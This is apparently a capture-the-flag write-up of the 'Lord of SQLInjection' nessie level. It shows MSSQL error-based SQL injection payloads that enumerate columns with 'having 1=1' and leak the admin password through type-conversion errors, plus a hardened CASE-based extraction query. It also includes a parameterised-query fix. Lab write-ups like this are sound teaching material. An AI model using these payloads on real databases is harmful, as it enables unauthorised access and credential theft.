
# [Lord Of SQLInjection] nessie

<figure><img src="https://blog.kakaocdn.net/dna/Cm7Cu/btsNEMFCUES/AAAAAAAAAAAAAAAAAAAAAHCtyO6lfsZ2FdGG1VhjiVqGwAAn668oS9a-fWKXhhhR/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=p%2BkLf159Cu0u8tUAsB0qwV8tBM0%3D" alt="" height="316" width="707"><figcaption></figcaption></figure>

#### Characteristics

\- The backend is MSSQL (SQL Server).

\- The strings master, sys, information, prob, waitfor and similar are filtered from the input.

\- So access to the metadata views and time-based SQL injection (delay via WAITFOR) are both blocked.

\- The goal is to recover the pw of the row whose id is admin.

\- The remaining channel is error-based SQL injection: MSSQL returns a descriptive error message when a query fails, and that message can be made to carry data.


#### First Try

```
[URL]?id=a' having 1=1 --
```

<figure><img src="https://blog.kakaocdn.net/dna/OqRLY/btsNEorsj07/AAAAAAAAAAAAAAAAAAAAAOwkNKLRKx55xqkZlI58FO48GfY80j9wLCcGh_dxonZB/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=6qN6aJLrxzLm3qC6ulAwQHwZ5TE%3D" alt="" height="109" width="1455"><figcaption></figcaption></figure>

\- Only `select id from prob_nessie where id='a' having 1=1` is executed; everything after `--` is commented out.

\- The error shown above is returned.

#### Why

\- A HAVING clause without a GROUP BY is only valid when the select list contains nothing but aggregates. Here the select list is the bare column id, so SQL Server rejects the query and, in the error text, names the column that is "invalid in the HAVING clause". That is why `having 1=1` is a standard column-name enumeration trick on MSSQL even when the metadata views are filtered.

\- The same idea solves the challenge: deliberately trigger an error whose message contains the pw of the row where id is admin.


#### Second Try

\- Trigger an implicit type conversion error on the pw column. The resulting predicate is `id='admin' and pw='1' or id='admin' and pw=1`; comparing the varchar column pw with the integer literal 1 makes SQL Server convert the stored value to int, the conversion fails, and the failing value is echoed in the error message.

```
[URL]?id=admin&pw=1' or id='admin' and pw=1 --
```

<figure><img src="https://blog.kakaocdn.net/dna/oWLGn/btsNDHE1WWC/AAAAAAAAAAAAAAAAAAAAAGBX561L4-rVAxbgLI9AO6jbC2xRLVvIK3G0es-mTca5/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=TIDKwkTWjVKsp1d36e56zFh4jYA%3D" alt="" height="106" width="1116"><figcaption></figcaption></figure>

→ The error message contains the pw value. Sending that value as the pw parameter in the browser URL solves the challenge.
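The two error leaks above, reproduced locally as an added example (my own T-SQL, not the challenge's source or the page's code). It assumes the challenge builds `select id from prob_nessie where id='<id>' and pw='<pw>'` by string concatenation (inferred from the error screenshot) with varchar columns id and pw; the sample rows are constructed, with the admin pw set to the value the page recovers. Step 3 goes beyond the page with a more robust payload, and step 4 shows the parameterised fix.

```sql
-- Added example (my own T-SQL, not the challenge's source or the page's code).
-- Assumed: the challenge builds
--   select id from prob_nessie where id='<id>' and pw='<pw>'
-- by string concatenation, with varchar columns id and pw.  Run in a scratch
-- SQL Server database; each step is its own batch (GO) so an error in one
-- batch does not stop the next.

CREATE TABLE prob_nessie (id VARCHAR(50) NOT NULL, pw VARCHAR(50) NOT NULL);
-- constructed rows; the admin pw is the value the page recovers
INSERT INTO prob_nessie (id, pw) VALUES ('guest', 'guest'), ('admin', '115d8d1a422f1f3e');
GO

-- 1) First Try: ?id=a' having 1=1 --
-- The select list contains a bare column (id) that is neither aggregated nor
-- in a GROUP BY, so SQL Server rejects the HAVING and names the column:
--   Column 'prob_nessie.id' is invalid in the HAVING clause because it is not
--   contained in either an aggregate function or the GROUP BY clause.
-- A column name leaks even though sys/information are filtered.
SELECT id FROM prob_nessie WHERE id='a' HAVING 1=1 --' and pw=''
GO

-- 2) Second Try: ?id=admin&pw=1' or id='admin' and pw=1 --
-- AND binds tighter than OR, so the predicate is
--   (id='admin' AND pw='1') OR (id='admin' AND pw=1)
-- pw is varchar, 1 is int, and int has the higher data-type precedence, so the
-- stored pw is converted to int; the conversion fails and echoes the value:
--   Conversion failed when converting the varchar value '115d8d1a422f1f3e'
--   to data type int.
SELECT id FROM prob_nessie WHERE id='admin' AND pw='1' OR id='admin' AND pw=1 --'
GO

-- 3) Generalisation (mine, not on the page).  Two weaknesses of step 2:
--    a) an all-digit pw would convert cleanly and leak nothing;
--    b) AND is not guaranteed to short-circuit, so the engine may convert
--       another row's pw first and echo that value instead of admin's.
-- A CASE pins the conversion to the admin row, and a non-numeric prefix forces
-- the error whatever the stored value is; no table name is needed, which
-- matters because the string "prob" is filtered by the challenge:
--   Conversion failed when converting the varchar value 'x115d8d1a422f1f3e'
--   to data type int.
SELECT id FROM prob_nessie
WHERE 1 = CASE WHEN id='admin' THEN 'x' + pw ELSE '0' END;
GO

-- 4) The fix: bind the input with sp_executesql.  The same payload is now just
-- a string compared against pw, so the query returns no rows and no error.
DECLARE @id NVARCHAR(50) = N'admin';
DECLARE @pw NVARCHAR(50) = N'1'' or id=''admin'' and pw=1 --';
EXEC sp_executesql
    N'SELECT id FROM prob_nessie WHERE id = @id AND pw = @pw',
    N'@id NVARCHAR(50), @pw NVARCHAR(50)',
    @id = @id, @pw = @pw;
GO

DROP TABLE prob_nessie;
GO
```

Run it in SSMS or sqlcmd against a throwaway database; steps 1 to 3 are expected to fail with the quoted messages, step 4 returns an empty result set. With the page's exact payload the leaked value is whichever row the engine converts first, which is why the CASE form in step 3 is the safer choice on a table with more than one row.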


#### Third Try

```
[URL]?id=admin&pw=115d8d1a422f1f3e
```

<figure><img src="https://blog.kakaocdn.net/dna/c0jLEd/btsNCDczhnR/AAAAAAAAAAAAAAAAAAAAALF0G6Va4aO0THmxIYppI9ivEJgAULyyFQX5innnw2SE/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=zE7JCmiQMA2z8e3rBr6nnxW52yM%3D" alt="" height="380" width="675"><figcaption></figcaption></figure>


